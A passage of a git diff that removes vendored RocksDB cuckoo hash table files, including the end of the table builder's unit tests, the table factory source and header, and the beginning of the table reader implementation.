-  std::vector<uint64_t> expected_locations = {0, 1, 2, 3};
-  std::vector<std::string> keys;
-  for (auto& user_key : user_keys) {
-    keys.push_back(GetInternalKey(user_key, false));
-  }
-  uint64_t expected_table_size = GetExpectedTableSize(keys.size());
-
-  unique_ptr<WritableFile> writable_file;
-  fname = test::TmpDir() + "/NoCollisionFullKey";
-  ASSERT_OK(env_->NewWritableFile(fname, &writable_file, env_options_));
-  unique_ptr<WritableFileWriter> file_writer(
-      new WritableFileWriter(std::move(writable_file), EnvOptions()));
-  CuckooTableBuilder builder(file_writer.get(), kHashTableRatio, num_hash_fun,
-                             100, BytewiseComparator(), 1, false, false,
-                             GetSliceHash, 0 /* column_family_id */,
-                             kDefaultColumnFamilyName);
-  ASSERT_OK(builder.status());
-  for (uint32_t i = 0; i < user_keys.size(); i++) {
-    builder.Add(Slice(keys[i]), Slice(values[i]));
-    ASSERT_EQ(builder.NumEntries(), i + 1);
-    ASSERT_OK(builder.status());
-  }
-  size_t bucket_size = keys[0].size() + values[0].size();
-  ASSERT_EQ(expected_table_size * bucket_size - 1, builder.FileSize());
-  ASSERT_OK(builder.Finish());
-  ASSERT_OK(file_writer->Close());
-  ASSERT_LE(expected_table_size * bucket_size, builder.FileSize());
-
-  std::string expected_unused_bucket = GetInternalKey("key00", true);
-  expected_unused_bucket += std::string(values[0].size(), 'a');
-  CheckFileContents(keys, values, expected_locations,
-      expected_unused_bucket, expected_table_size, 2, false);
-}
-
-TEST_F(CuckooBuilderTest, WriteSuccessWithCollisionFullKey) {
-  uint32_t num_hash_fun = 4;
-  std::vector<std::string> user_keys = {"key01", "key02", "key03", "key04"};
-  std::vector<std::string> values = {"v01", "v02", "v03", "v04"};
-  // Need to have a temporary variable here as VS compiler does not currently
-  // support operator= with initializer_list as a parameter
-  std::unordered_map<std::string, std::vector<uint64_t>> hm = {
-      {user_keys[0], {0, 1, 2, 3}},
-      {user_keys[1], {0, 1, 2, 3}},
-      {user_keys[2], {0, 1, 2, 3}},
-      {user_keys[3], {0, 1, 2, 3}},
-  };
-  hash_map = std::move(hm);
-
-  std::vector<uint64_t> expected_locations = {0, 1, 2, 3};
-  std::vector<std::string> keys;
-  for (auto& user_key : user_keys) {
-    keys.push_back(GetInternalKey(user_key, false));
-  }
-  uint64_t expected_table_size = GetExpectedTableSize(keys.size());
-
-  unique_ptr<WritableFile> writable_file;
-  fname = test::TmpDir() + "/WithCollisionFullKey";
-  ASSERT_OK(env_->NewWritableFile(fname, &writable_file, env_options_));
-  unique_ptr<WritableFileWriter> file_writer(
-      new WritableFileWriter(std::move(writable_file), EnvOptions()));
-  CuckooTableBuilder builder(file_writer.get(), kHashTableRatio, num_hash_fun,
-                             100, BytewiseComparator(), 1, false, false,
-                             GetSliceHash, 0 /* column_family_id */,
-                             kDefaultColumnFamilyName);
-  ASSERT_OK(builder.status());
-  for (uint32_t i = 0; i < user_keys.size(); i++) {
-    builder.Add(Slice(keys[i]), Slice(values[i]));
-    ASSERT_EQ(builder.NumEntries(), i + 1);
-    ASSERT_OK(builder.status());
-  }
-  size_t bucket_size = keys[0].size() + values[0].size();
-  ASSERT_EQ(expected_table_size * bucket_size - 1, builder.FileSize());
-  ASSERT_OK(builder.Finish());
-  ASSERT_OK(file_writer->Close());
-  ASSERT_LE(expected_table_size * bucket_size, builder.FileSize());
-
-  std::string expected_unused_bucket = GetInternalKey("key00", true);
-  expected_unused_bucket += std::string(values[0].size(), 'a');
-  CheckFileContents(keys, values, expected_locations,
-      expected_unused_bucket, expected_table_size, 4, false);
-}
-
-TEST_F(CuckooBuilderTest, WriteSuccessWithCollisionAndCuckooBlock) {
-  uint32_t num_hash_fun = 4;
-  std::vector<std::string> user_keys = {"key01", "key02", "key03", "key04"};
-  std::vector<std::string> values = {"v01", "v02", "v03", "v04"};
-  // Need to have a temporary variable here as VS compiler does not currently
-  // support operator= with initializer_list as a parameter
-  std::unordered_map<std::string, std::vector<uint64_t>> hm = {
-      {user_keys[0], {0, 1, 2, 3}},
-      {user_keys[1], {0, 1, 2, 3}},
-      {user_keys[2], {0, 1, 2, 3}},
-      {user_keys[3], {0, 1, 2, 3}},
-  };
-  hash_map = std::move(hm);
-
-  std::vector<uint64_t> expected_locations = {0, 1, 2, 3};
-  std::vector<std::string> keys;
-  for (auto& user_key : user_keys) {
-    keys.push_back(GetInternalKey(user_key, false));
-  }
-  uint64_t expected_table_size = GetExpectedTableSize(keys.size());
-
-  unique_ptr<WritableFile> writable_file;
-  uint32_t cuckoo_block_size = 2;
-  fname = test::TmpDir() + "/WithCollisionFullKey2";
-  ASSERT_OK(env_->NewWritableFile(fname, &writable_file, env_options_));
-  unique_ptr<WritableFileWriter> file_writer(
-      new WritableFileWriter(std::move(writable_file), EnvOptions()));
-  CuckooTableBuilder builder(
-      file_writer.get(), kHashTableRatio, num_hash_fun, 100,
-      BytewiseComparator(), cuckoo_block_size, false, false, GetSliceHash,
-      0 /* column_family_id */, kDefaultColumnFamilyName);
-  ASSERT_OK(builder.status());
-  for (uint32_t i = 0; i < user_keys.size(); i++) {
-    builder.Add(Slice(keys[i]), Slice(values[i]));
-    ASSERT_EQ(builder.NumEntries(), i + 1);
-    ASSERT_OK(builder.status());
-  }
-  size_t bucket_size = keys[0].size() + values[0].size();
-  ASSERT_EQ(expected_table_size * bucket_size - 1, builder.FileSize());
-  ASSERT_OK(builder.Finish());
-  ASSERT_OK(file_writer->Close());
-  ASSERT_LE(expected_table_size * bucket_size, builder.FileSize());
-
-  std::string expected_unused_bucket = GetInternalKey("key00", true);
-  expected_unused_bucket += std::string(values[0].size(), 'a');
-  CheckFileContents(keys, values, expected_locations,
-      expected_unused_bucket, expected_table_size, 3, false, cuckoo_block_size);
-}
-
-TEST_F(CuckooBuilderTest, WithCollisionPathFullKey) {
-  // Have two hash functions. Insert elements with overlapping hashes.
-  // Finally insert an element with hash value somewhere in the middle
-  // so that it displaces all the elements after that.
-  uint32_t num_hash_fun = 2;
-  std::vector<std::string> user_keys = {"key01", "key02", "key03",
-    "key04", "key05"};
-  std::vector<std::string> values = {"v01", "v02", "v03", "v04", "v05"};
-  // Need to have a temporary variable here as VS compiler does not currently
-  // support operator= with initializer_list as a parameter
-  std::unordered_map<std::string, std::vector<uint64_t>> hm = {
-      {user_keys[0], {0, 1}},
-      {user_keys[1], {1, 2}},
-      {user_keys[2], {2, 3}},
-      {user_keys[3], {3, 4}},
-      {user_keys[4], {0, 2}},
-  };
-  hash_map = std::move(hm);
-
-  std::vector<uint64_t> expected_locations = {0, 1, 3, 4, 2};
-  std::vector<std::string> keys;
-  for (auto& user_key : user_keys) {
-    keys.push_back(GetInternalKey(user_key, false));
-  }
-  uint64_t expected_table_size = GetExpectedTableSize(keys.size());
-
-  unique_ptr<WritableFile> writable_file;
-  fname = test::TmpDir() + "/WithCollisionPathFullKey";
-  ASSERT_OK(env_->NewWritableFile(fname, &writable_file, env_options_));
-  unique_ptr<WritableFileWriter> file_writer(
-      new WritableFileWriter(std::move(writable_file), EnvOptions()));
-  CuckooTableBuilder builder(file_writer.get(), kHashTableRatio, num_hash_fun,
-                             100, BytewiseComparator(), 1, false, false,
-                             GetSliceHash, 0 /* column_family_id */,
-                             kDefaultColumnFamilyName);
-  ASSERT_OK(builder.status());
-  for (uint32_t i = 0; i < user_keys.size(); i++) {
-    builder.Add(Slice(keys[i]), Slice(values[i]));
-    ASSERT_EQ(builder.NumEntries(), i + 1);
-    ASSERT_OK(builder.status());
-  }
-  size_t bucket_size = keys[0].size() + values[0].size();
-  ASSERT_EQ(expected_table_size * bucket_size - 1, builder.FileSize());
-  ASSERT_OK(builder.Finish());
-  ASSERT_OK(file_writer->Close());
-  ASSERT_LE(expected_table_size * bucket_size, builder.FileSize());
-
-  std::string expected_unused_bucket = GetInternalKey("key00", true);
-  expected_unused_bucket += std::string(values[0].size(), 'a');
-  CheckFileContents(keys, values, expected_locations,
-      expected_unused_bucket, expected_table_size, 2, false);
-}
-
-TEST_F(CuckooBuilderTest, WithCollisionPathFullKeyAndCuckooBlock) {
-  uint32_t num_hash_fun = 2;
-  std::vector<std::string> user_keys = {"key01", "key02", "key03",
-    "key04", "key05"};
-  std::vector<std::string> values = {"v01", "v02", "v03", "v04", "v05"};
-  // Need to have a temporary variable here as VS compiler does not currently
-  // support operator= with initializer_list as a parameter
-  std::unordered_map<std::string, std::vector<uint64_t>> hm = {
-      {user_keys[0], {0, 1}},
-      {user_keys[1], {1, 2}},
-      {user_keys[2], {3, 4}},
-      {user_keys[3], {4, 5}},
-      {user_keys[4], {0, 3}},
-  };
-  hash_map = std::move(hm);
-
-  std::vector<uint64_t> expected_locations = {2, 1, 3, 4, 0};
-  std::vector<std::string> keys;
-  for (auto& user_key : user_keys) {
-    keys.push_back(GetInternalKey(user_key, false));
-  }
-  uint64_t expected_table_size = GetExpectedTableSize(keys.size());
-
-  unique_ptr<WritableFile> writable_file;
-  fname = test::TmpDir() + "/WithCollisionPathFullKeyAndCuckooBlock";
-  ASSERT_OK(env_->NewWritableFile(fname, &writable_file, env_options_));
-  unique_ptr<WritableFileWriter> file_writer(
-      new WritableFileWriter(std::move(writable_file), EnvOptions()));
-  CuckooTableBuilder builder(file_writer.get(), kHashTableRatio, num_hash_fun,
-                             100, BytewiseComparator(), 2, false, false,
-                             GetSliceHash, 0 /* column_family_id */,
-                             kDefaultColumnFamilyName);
-  ASSERT_OK(builder.status());
-  for (uint32_t i = 0; i < user_keys.size(); i++) {
-    builder.Add(Slice(keys[i]), Slice(values[i]));
-    ASSERT_EQ(builder.NumEntries(), i + 1);
-    ASSERT_OK(builder.status());
-  }
-  size_t bucket_size = keys[0].size() + values[0].size();
-  ASSERT_EQ(expected_table_size * bucket_size - 1, builder.FileSize());
-  ASSERT_OK(builder.Finish());
-  ASSERT_OK(file_writer->Close());
-  ASSERT_LE(expected_table_size * bucket_size, builder.FileSize());
-
-  std::string expected_unused_bucket = GetInternalKey("key00", true);
-  expected_unused_bucket += std::string(values[0].size(), 'a');
-  CheckFileContents(keys, values, expected_locations,
-      expected_unused_bucket, expected_table_size, 2, false, 2);
-}
-
-TEST_F(CuckooBuilderTest, WriteSuccessNoCollisionUserKey) {
-  uint32_t num_hash_fun = 4;
-  std::vector<std::string> user_keys = {"key01", "key02", "key03", "key04"};
-  std::vector<std::string> values = {"v01", "v02", "v03", "v04"};
-  // Need to have a temporary variable here as VS compiler does not currently
-  // support operator= with initializer_list as a parameter
-  std::unordered_map<std::string, std::vector<uint64_t>> hm = {
-      {user_keys[0], {0, 1, 2, 3}},
-      {user_keys[1], {1, 2, 3, 4}},
-      {user_keys[2], {2, 3, 4, 5}},
-      {user_keys[3], {3, 4, 5, 6}}};
-  hash_map = std::move(hm);
-
-  std::vector<uint64_t> expected_locations = {0, 1, 2, 3};
-  uint64_t expected_table_size = GetExpectedTableSize(user_keys.size());
-
-  unique_ptr<WritableFile> writable_file;
-  fname = test::TmpDir() + "/NoCollisionUserKey";
-  ASSERT_OK(env_->NewWritableFile(fname, &writable_file, env_options_));
-  unique_ptr<WritableFileWriter> file_writer(
-      new WritableFileWriter(std::move(writable_file), EnvOptions()));
-  CuckooTableBuilder builder(file_writer.get(), kHashTableRatio, num_hash_fun,
-                             100, BytewiseComparator(), 1, false, false,
-                             GetSliceHash, 0 /* column_family_id */,
-                             kDefaultColumnFamilyName);
-  ASSERT_OK(builder.status());
-  for (uint32_t i = 0; i < user_keys.size(); i++) {
-    builder.Add(Slice(GetInternalKey(user_keys[i], true)), Slice(values[i]));
-    ASSERT_EQ(builder.NumEntries(), i + 1);
-    ASSERT_OK(builder.status());
-  }
-  size_t bucket_size = user_keys[0].size() + values[0].size();
-  ASSERT_EQ(expected_table_size * bucket_size - 1, builder.FileSize());
-  ASSERT_OK(builder.Finish());
-  ASSERT_OK(file_writer->Close());
-  ASSERT_LE(expected_table_size * bucket_size, builder.FileSize());
-
-  std::string expected_unused_bucket = "key00";
-  expected_unused_bucket += std::string(values[0].size(), 'a');
-  CheckFileContents(user_keys, values, expected_locations,
-      expected_unused_bucket, expected_table_size, 2, true);
-}
-
-TEST_F(CuckooBuilderTest, WriteSuccessWithCollisionUserKey) {
-  uint32_t num_hash_fun = 4;
-  std::vector<std::string> user_keys = {"key01", "key02", "key03", "key04"};
-  std::vector<std::string> values = {"v01", "v02", "v03", "v04"};
-  // Need to have a temporary variable here as VS compiler does not currently
-  // support operator= with initializer_list as a parameter
-  std::unordered_map<std::string, std::vector<uint64_t>> hm = {
-      {user_keys[0], {0, 1, 2, 3}},
-      {user_keys[1], {0, 1, 2, 3}},
-      {user_keys[2], {0, 1, 2, 3}},
-      {user_keys[3], {0, 1, 2, 3}},
-  };
-  hash_map = std::move(hm);
-
-  std::vector<uint64_t> expected_locations = {0, 1, 2, 3};
-  uint64_t expected_table_size = GetExpectedTableSize(user_keys.size());
-
-  unique_ptr<WritableFile> writable_file;
-  fname = test::TmpDir() + "/WithCollisionUserKey";
-  ASSERT_OK(env_->NewWritableFile(fname, &writable_file, env_options_));
-  unique_ptr<WritableFileWriter> file_writer(
-      new WritableFileWriter(std::move(writable_file), EnvOptions()));
-  CuckooTableBuilder builder(file_writer.get(), kHashTableRatio, num_hash_fun,
-                             100, BytewiseComparator(), 1, false, false,
-                             GetSliceHash, 0 /* column_family_id */,
-                             kDefaultColumnFamilyName);
-  ASSERT_OK(builder.status());
-  for (uint32_t i = 0; i < user_keys.size(); i++) {
-    builder.Add(Slice(GetInternalKey(user_keys[i], true)), Slice(values[i]));
-    ASSERT_EQ(builder.NumEntries(), i + 1);
-    ASSERT_OK(builder.status());
-  }
-  size_t bucket_size = user_keys[0].size() + values[0].size();
-  ASSERT_EQ(expected_table_size * bucket_size - 1, builder.FileSize());
-  ASSERT_OK(builder.Finish());
-  ASSERT_OK(file_writer->Close());
-  ASSERT_LE(expected_table_size * bucket_size, builder.FileSize());
-
-  std::string expected_unused_bucket = "key00";
-  expected_unused_bucket += std::string(values[0].size(), 'a');
-  CheckFileContents(user_keys, values, expected_locations,
-      expected_unused_bucket, expected_table_size, 4, true);
-}
-
-TEST_F(CuckooBuilderTest, WithCollisionPathUserKey) {
-  uint32_t num_hash_fun = 2;
-  std::vector<std::string> user_keys = {"key01", "key02", "key03",
-    "key04", "key05"};
-  std::vector<std::string> values = {"v01", "v02", "v03", "v04", "v05"};
-  // Need to have a temporary variable here as VS compiler does not currently
-  // support operator= with initializer_list as a parameter
-  std::unordered_map<std::string, std::vector<uint64_t>> hm = {
-      {user_keys[0], {0, 1}},
-      {user_keys[1], {1, 2}},
-      {user_keys[2], {2, 3}},
-      {user_keys[3], {3, 4}},
-      {user_keys[4], {0, 2}},
-  };
-  hash_map = std::move(hm);
-
-  std::vector<uint64_t> expected_locations = {0, 1, 3, 4, 2};
-  uint64_t expected_table_size = GetExpectedTableSize(user_keys.size());
-
-  unique_ptr<WritableFile> writable_file;
-  fname = test::TmpDir() + "/WithCollisionPathUserKey";
-  ASSERT_OK(env_->NewWritableFile(fname, &writable_file, env_options_));
-  unique_ptr<WritableFileWriter> file_writer(
-      new WritableFileWriter(std::move(writable_file), EnvOptions()));
-  CuckooTableBuilder builder(file_writer.get(), kHashTableRatio, num_hash_fun,
-                             2, BytewiseComparator(), 1, false, false,
-                             GetSliceHash, 0 /* column_family_id */,
-                             kDefaultColumnFamilyName);
-  ASSERT_OK(builder.status());
-  for (uint32_t i = 0; i < user_keys.size(); i++) {
-    builder.Add(Slice(GetInternalKey(user_keys[i], true)), Slice(values[i]));
-    ASSERT_EQ(builder.NumEntries(), i + 1);
-    ASSERT_OK(builder.status());
-  }
-  size_t bucket_size = user_keys[0].size() + values[0].size();
-  ASSERT_EQ(expected_table_size * bucket_size - 1, builder.FileSize());
-  ASSERT_OK(builder.Finish());
-  ASSERT_OK(file_writer->Close());
-  ASSERT_LE(expected_table_size * bucket_size, builder.FileSize());
-
-  std::string expected_unused_bucket = "key00";
-  expected_unused_bucket += std::string(values[0].size(), 'a');
-  CheckFileContents(user_keys, values, expected_locations,
-      expected_unused_bucket, expected_table_size, 2, true);
-}
-
-TEST_F(CuckooBuilderTest, FailWhenCollisionPathTooLong) {
-  // Have two hash functions. Insert elements with overlapping hashes.
-  // Finally try inserting an element with hash value somewhere in the middle
-  // and it should fail because the no. of elements to displace is too high.
-  uint32_t num_hash_fun = 2;
-  std::vector<std::string> user_keys = {"key01", "key02", "key03",
-    "key04", "key05"};
-  // Need to have a temporary variable here as VS compiler does not currently
-  // support operator= with initializer_list as a parameter
-  std::unordered_map<std::string, std::vector<uint64_t>> hm = {
-      {user_keys[0], {0, 1}},
-      {user_keys[1], {1, 2}},
-      {user_keys[2], {2, 3}},
-      {user_keys[3], {3, 4}},
-      {user_keys[4], {0, 1}},
-  };
-  hash_map = std::move(hm);
-
-  unique_ptr<WritableFile> writable_file;
-  fname = test::TmpDir() + "/WithCollisionPathUserKey";
-  ASSERT_OK(env_->NewWritableFile(fname, &writable_file, env_options_));
-  unique_ptr<WritableFileWriter> file_writer(
-      new WritableFileWriter(std::move(writable_file), EnvOptions()));
-  CuckooTableBuilder builder(file_writer.get(), kHashTableRatio, num_hash_fun,
-                             2, BytewiseComparator(), 1, false, false,
-                             GetSliceHash, 0 /* column_family_id */,
-                             kDefaultColumnFamilyName);
-  ASSERT_OK(builder.status());
-  for (uint32_t i = 0; i < user_keys.size(); i++) {
-    builder.Add(Slice(GetInternalKey(user_keys[i], false)), Slice("value"));
-    ASSERT_EQ(builder.NumEntries(), i + 1);
-    ASSERT_OK(builder.status());
-  }
-  ASSERT_TRUE(builder.Finish().IsNotSupported());
-  ASSERT_OK(file_writer->Close());
-}
-
-TEST_F(CuckooBuilderTest, FailWhenSameKeyInserted) {
-  // Need to have a temporary variable here as VS compiler does not currently
-  // support operator= with initializer_list as a parameter
-  std::unordered_map<std::string, std::vector<uint64_t>> hm = {
-      {"repeatedkey", {0, 1, 2, 3}}};
-  hash_map = std::move(hm);
-  uint32_t num_hash_fun = 4;
-  std::string user_key = "repeatedkey";
-
-  unique_ptr<WritableFile> writable_file;
-  fname = test::TmpDir() + "/FailWhenSameKeyInserted";
-  ASSERT_OK(env_->NewWritableFile(fname, &writable_file, env_options_));
-  unique_ptr<WritableFileWriter> file_writer(
-      new WritableFileWriter(std::move(writable_file), EnvOptions()));
-  CuckooTableBuilder builder(file_writer.get(), kHashTableRatio, num_hash_fun,
-                             100, BytewiseComparator(), 1, false, false,
-                             GetSliceHash, 0 /* column_family_id */,
-                             kDefaultColumnFamilyName);
-  ASSERT_OK(builder.status());
-
-  builder.Add(Slice(GetInternalKey(user_key, false)), Slice("value1"));
-  ASSERT_EQ(builder.NumEntries(), 1u);
-  ASSERT_OK(builder.status());
-  builder.Add(Slice(GetInternalKey(user_key, true)), Slice("value2"));
-  ASSERT_EQ(builder.NumEntries(), 2u);
-  ASSERT_OK(builder.status());
-
-  ASSERT_TRUE(builder.Finish().IsNotSupported());
-  ASSERT_OK(file_writer->Close());
-}
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as Cuckoo table is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/cuckoo_table_factory.cc b/thirdparty/rocksdb/table/cuckoo_table_factory.cc
deleted file mode 100644
index 2325bcf..0000000
--- a/thirdparty/rocksdb/table/cuckoo_table_factory.cc
+++ /dev/null
@@ -1,72 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-#include "table/cuckoo_table_factory.h"
-
-#include "db/dbformat.h"
-#include "table/cuckoo_table_builder.h"
-#include "table/cuckoo_table_reader.h"
-
-namespace rocksdb {
-
-Status CuckooTableFactory::NewTableReader(
-    const TableReaderOptions& table_reader_options,
-    unique_ptr<RandomAccessFileReader>&& file, uint64_t file_size,
-    std::unique_ptr<TableReader>* table,
-    bool prefetch_index_and_filter_in_cache) const {
-  std::unique_ptr<CuckooTableReader> new_reader(new CuckooTableReader(
-      table_reader_options.ioptions, std::move(file), file_size,
-      table_reader_options.internal_comparator.user_comparator(), nullptr));
-  Status s = new_reader->status();
-  if (s.ok()) {
-    *table = std::move(new_reader);
-  }
-  return s;
-}
-
-TableBuilder* CuckooTableFactory::NewTableBuilder(
-    const TableBuilderOptions& table_builder_options, uint32_t column_family_id,
-    WritableFileWriter* file) const {
-  // Ignore the skipFIlters flag. Does not apply to this file format
-  //
-
-  // TODO: change builder to take the option struct
-  return new CuckooTableBuilder(
-      file, table_options_.hash_table_ratio, 64,
-      table_options_.max_search_depth,
-      table_builder_options.internal_comparator.user_comparator(),
-      table_options_.cuckoo_block_size, table_options_.use_module_hash,
-      table_options_.identity_as_first_hash, nullptr /* get_slice_hash */,
-      column_family_id, table_builder_options.column_family_name);
-}
-
-std::string CuckooTableFactory::GetPrintableTableOptions() const {
-  std::string ret;
-  ret.reserve(2000);
-  const int kBufferSize = 200;
-  char buffer[kBufferSize];
-
-  snprintf(buffer, kBufferSize, "  hash_table_ratio: %lf\n",
-           table_options_.hash_table_ratio);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  max_search_depth: %u\n",
-           table_options_.max_search_depth);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  cuckoo_block_size: %u\n",
-           table_options_.cuckoo_block_size);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  identity_as_first_hash: %d\n",
-           table_options_.identity_as_first_hash);
-  ret.append(buffer);
-  return ret;
-}
-
-TableFactory* NewCuckooTableFactory(const CuckooTableOptions& table_options) {
-  return new CuckooTableFactory(table_options);
-}
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/cuckoo_table_factory.h b/thirdparty/rocksdb/table/cuckoo_table_factory.h
deleted file mode 100644
index db860c3..0000000
--- a/thirdparty/rocksdb/table/cuckoo_table_factory.h
+++ /dev/null
@@ -1,89 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <string>
-#include "rocksdb/table.h"
-#include "util/murmurhash.h"
-#include "rocksdb/options.h"
-
-namespace rocksdb {
-
-const uint32_t kCuckooMurmurSeedMultiplier = 816922183;
-static inline uint64_t CuckooHash(
-    const Slice& user_key, uint32_t hash_cnt, bool use_module_hash,
-    uint64_t table_size_, bool identity_as_first_hash,
-    uint64_t (*get_slice_hash)(const Slice&, uint32_t, uint64_t)) {
-#if !defined NDEBUG || defined OS_WIN
-  // This part is used only in unit tests but we have to keep it for Windows
-  // build as we run test in both debug and release modes under Windows.
-  if (get_slice_hash != nullptr) {
-    return get_slice_hash(user_key, hash_cnt, table_size_);
-  }
-#endif
-
-  uint64_t value = 0;
-  if (hash_cnt == 0 && identity_as_first_hash) {
-    value = (*reinterpret_cast<const int64_t*>(user_key.data()));
-  } else {
-    value = MurmurHash(user_key.data(), static_cast<int>(user_key.size()),
-                       kCuckooMurmurSeedMultiplier * hash_cnt);
-  }
-  if (use_module_hash) {
-    return value % table_size_;
-  } else {
-    return value & (table_size_ - 1);
-  }
-}
-
-// Cuckoo Table is designed for applications that require fast point lookups
-// but not fast range scans.
-//
-// Some assumptions:
-// - Key length and Value length are fixed.
-// - Does not support Snapshot.
-// - Does not support Merge operations.
-// - Does not support prefix bloom filters.
-class CuckooTableFactory : public TableFactory {
- public:
-  explicit CuckooTableFactory(const CuckooTableOptions& table_options)
-    : table_options_(table_options) {}
-  ~CuckooTableFactory() {}
-
-  const char* Name() const override { return "CuckooTable"; }
-
-  Status NewTableReader(
-      const TableReaderOptions& table_reader_options,
-      unique_ptr<RandomAccessFileReader>&& file, uint64_t file_size,
-      unique_ptr<TableReader>* table,
-      bool prefetch_index_and_filter_in_cache = true) const override;
-
-  TableBuilder* NewTableBuilder(
-      const TableBuilderOptions& table_builder_options,
-      uint32_t column_family_id, WritableFileWriter* file) const override;
-
-  // Sanitizes the specified DB Options.
-  Status SanitizeOptions(const DBOptions& db_opts,
-                         const ColumnFamilyOptions& cf_opts) const override {
-    return Status::OK();
-  }
-
-  std::string GetPrintableTableOptions() const override;
-
-  void* GetOptions() override { return &table_options_; }
-
-  Status GetOptionString(std::string* opt_string,
-                         const std::string& delimiter) const override {
-    return Status::OK();
-  }
-
- private:
-  CuckooTableOptions table_options_;
-};
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/cuckoo_table_reader.cc b/thirdparty/rocksdb/table/cuckoo_table_reader.cc
deleted file mode 100644
index 9ceceba..0000000
--- a/thirdparty/rocksdb/table/cuckoo_table_reader.cc
+++ /dev/null
@@ -1,385 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef ROCKSDB_LITE
-#include "table/cuckoo_table_reader.h"
-
-#include <algorithm>
-#include <limits>
-#include <string>
-#include <utility>
-#include <vector>
-#include "rocksdb/iterator.h"
-#include "rocksdb/table.h"
-#include "table/internal_iterator.h"
-#include "table/meta_blocks.h"
-#include "table/cuckoo_table_factory.h"
-#include "table/get_context.h"
-#include "util/arena.h"
-#include "util/coding.h"
-
-namespace rocksdb {
-namespace {
-const uint64_t CACHE_LINE_MASK = ~((uint64_t)CACHE_LINE_SIZE - 1);
-const uint32_t kInvalidIndex = std::numeric_limits<uint32_t>::max();
-}
-
-extern const uint64_t kCuckooTableMagicNumber;
-
-CuckooTableReader::CuckooTableReader(
-    const ImmutableCFOptions& ioptions,
-    std::unique_ptr<RandomAccessFileReader>&& file, uint64_t file_size,
-    const Comparator* comparator,
-    uint64_t (*get_slice_hash)(const Slice&, uint32_t, uint64_t))
-    : file_(std::move(file)),
-      ucomp_(comparator),
-      get_slice_hash_(get_slice_hash) {
-  if (!ioptions.allow_mmap_reads) {
-    status_ = Status::InvalidArgument("File is not mmaped");
-  }
-  TableProperties* props = nullptr;
-  status_ = ReadTableProperties(file_.get(), file_size, kCuckooTableMagicNumber,
-      ioptions, &props);
-  if (!status_.ok()) {
-    return;
-  }
-  table_props_.reset(props);
-  auto& user_props = props->user_collected_properties;
-  auto hash_funs = user_props.find(CuckooTablePropertyNames::kNumHashFunc);
-  if (hash_funs == user_props.end()) {
-    status_ = Status::Corruption("Number of hash functions not found");
-    return;
-  }
-  num_hash_func_ = *reinterpret_cast<const uint32_t*>(hash_funs->second.data());
-  auto unused_key = user_props.find(CuckooTablePropertyNames::kEmptyKey);
-  if (unused_key == user_props.end()) {
-    status_ = Status::Corruption("Empty bucket value not found");
-    return;
-  }
-  unused_key_ = unused_key->second;
-
-  key_length_ = static_cast<uint32_t>(props->fixed_key_len);
-  auto user_key_len = user_props.find(CuckooTablePropertyNames::kUserKeyLength);
-  if (user_key_len == user_props.end()) {
-    status_ = Status::Corruption("User key length not found");
-    return;
-  }
-  user_key_length_ = *reinterpret_cast<const uint32_t*>(
-      user_key_len->second.data());
-
-  auto value_length = user_props.find(CuckooTablePropertyNames::kValueLength);
-  if (value_length == user_props.end()) {
-    status_ = Status::Corruption("Value length not found");
-    return;
-  }
-  value_length_ = *reinterpret_cast<const uint32_t*>(
-      value_length->second.data());
-  bucket_length_ = key_length_ + value_length_;
-
-  auto hash_table_size = user_props.find(
-      CuckooTablePropertyNames::kHashTableSize);
-  if (hash_table_size == user_props.end()) {
-    status_ = Status::Corruption("Hash table size not found");
-    return;
-  }
-  table_size_ = *reinterpret_cast<const uint64_t*>(
-      hash_table_size->second.data());
-
-  auto is_last_level = user_props.find(CuckooTablePropertyNames::kIsLastLevel);
-  if (is_last_level == user_props.end()) {
-    status_ = Status::Corruption("Is last level not found");
-    return;
-  }
-  is_last_level_ = *reinterpret_cast<const bool*>(is_last_level->second.data());
-
-  auto identity_as_first_hash = user_props.find(
-      CuckooTablePropertyNames::kIdentityAsFirstHash);
-  if (identity_as_first_hash == user_props.end()) {
-    status_ = Status::Corruption("identity as first hash not found");
-    return;
-  }
-  identity_as_first_hash_ = *reinterpret_cast<const bool*>(
-      identity_as_first_hash->second.data());
-
-  auto use_module_hash = user_props.find(
-      CuckooTablePropertyNames::kUseModuleHash);
-  if (use_module_hash == user_props.end()) {
-    status_ = Status::Corruption("hash type is not found");
-    return;
-  }
-  use_module_hash_ = *reinterpret_cast<const bool*>(
-      use_module_hash->second.data());
-  auto cuckoo_block_size = user_props.find(
-      CuckooTablePropertyNames::kCuckooBlockSize);
-  if (cuckoo_block_size == user_props.end()) {
-    status_ = Status::Corruption("Cuckoo block size not found");
-    return;
-  }
-  cuckoo_block_size_ = *reinterpret_cast<const uint32_t*>(
-      cuckoo_block_size->second.data());
-  cuckoo_block_bytes_minus_one_ = cuckoo_block_size_ * bucket_length_ - 1;
-  status_ = file_->Read(0, file_size, &file_data_, nullptr);
-}
-
-Status CuckooTableReader::Get(const ReadOptions& readOptions, const Slice& key,
